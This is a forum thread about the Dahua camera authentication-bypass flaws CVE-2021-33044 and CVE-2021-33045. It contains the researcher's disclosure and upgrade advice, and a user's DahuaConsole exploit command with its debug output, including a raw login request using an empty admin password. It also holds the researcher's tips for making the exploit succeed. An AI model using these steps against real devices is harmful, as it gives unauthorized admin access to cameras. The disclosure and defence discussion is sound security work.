FYI
Dahua CVE-2021-33044; CVE-2021-33045
My initial release will be on Sept 6, and later FD on Oct 6.
Dahua CVE-2021-33044; CVE-2021-33045
My initial release will be on Sept 6, and later FD on Oct 6.
Dahua CVE-2021-33044; CVE-2021-33045
- Thread starter bashis
- Start date
alastairstevenson
Staff member
It seems to be the season for severe vulnerabilities being disclosed.
The Annke one was also pretty bad -
ipcamtalk.com
The Annke one was also pretty bad -
Annke N48PBB NVR vulnerability
If you have one of these on the Internet you might want to update. And reconsider having any IoT exposed to the internet in the first place :) https://www.nozominetworks.com/blog/new-annke-vulnerability-shows-risks-of-iot-security-camera-systems/
Cool stuff, both these CVE will not give you RCE, but will give you Admin access to device if not using fixed FW, you should upgrade soonest. If no new FW can be found for your device one Dahua website (like many of my own), you should defiantly contact Dahua support and do official complain.It seems to be the season for severe vulnerabilities being disclosed.
The Annke one was also pretty bad -
Annke N48PBB NVR vulnerability
If you have one of these on the Internet you might want to update. And reconsider having any IoT exposed to the internet in the first place :) https://www.nozominetworks.com/blog/new-annke-vulnerability-shows-risks-of-iot-security-camera-systems/
[Updates]
Details here
PoC here
(Obsolete: "Dahua-JSON-Debug-Console-v2.py" - replaced with "DahuaConsole")
Details here
PoC here
(Obsolete: "Dahua-JSON-Debug-Console-v2.py" - replaced with "DahuaConsole")
bigredfish
Known around here
Ughhh
swhomeautomation
n3wb
Hi. I tried DahuaConsole on some Alibi Security clones of Dahua cameras but was unsuccessful. The only ports that nmap reports are: 80, 81, 85, 554, 5060, and 49152.
Of the examples on the Github, this was the only one that could connect to the camera. Does the p2p EOF error mean that the exploit won't work on my camera?
Thanks
Code:
/DahuaConsole# ./Console.py --logon loopback --rhost 172.16.0.10 --rport 80 -d
[*] [Dahua Debug Console 2019-2021 bashis <mcw noemail eu>]
[*] logon type "loopback" with proto "dhip" at 172.16.0.10:80
[+] Opening connection to 172.16.0.10 on port 80: Done
[-] Dahua Debug Console: Failed
[-] Login: global.login [random]
[BEGIN SEND (172.16.0.10)] <------------------1801------------------>
20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000
{"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0}
[ END SEND (172.16.0.10)] <------------------1801------------------>
[*] Closed connection to 172.16.0.10 port 80
[-] [p2p] EOFError()
[*] All doneThanks
Noted you missing the TCP/37777 port, sure it is Dahua clone?
You don't receive anything back from the device, thereof "[-] [p2p] EOFError()"
Can you login with the script at all on the device w/ valid credentials?
- You could try some of these '--proto {dhip,dvrip,3des,http,https}'.
- If it's old FW - older than 2017ish, you could try to add "magic":"0x1234" to all outgoing JSON in net.py : p2p() at 'packet.update({})'
Hi mate,
I am seeing few break-in attempts on my dahua NVR 5216 and these attempt is similar to the exploits which you discoverer , is there anywhere in the log does it captures the origin of the attack ?
In the NVR logs I can only see "IP address: local login" ?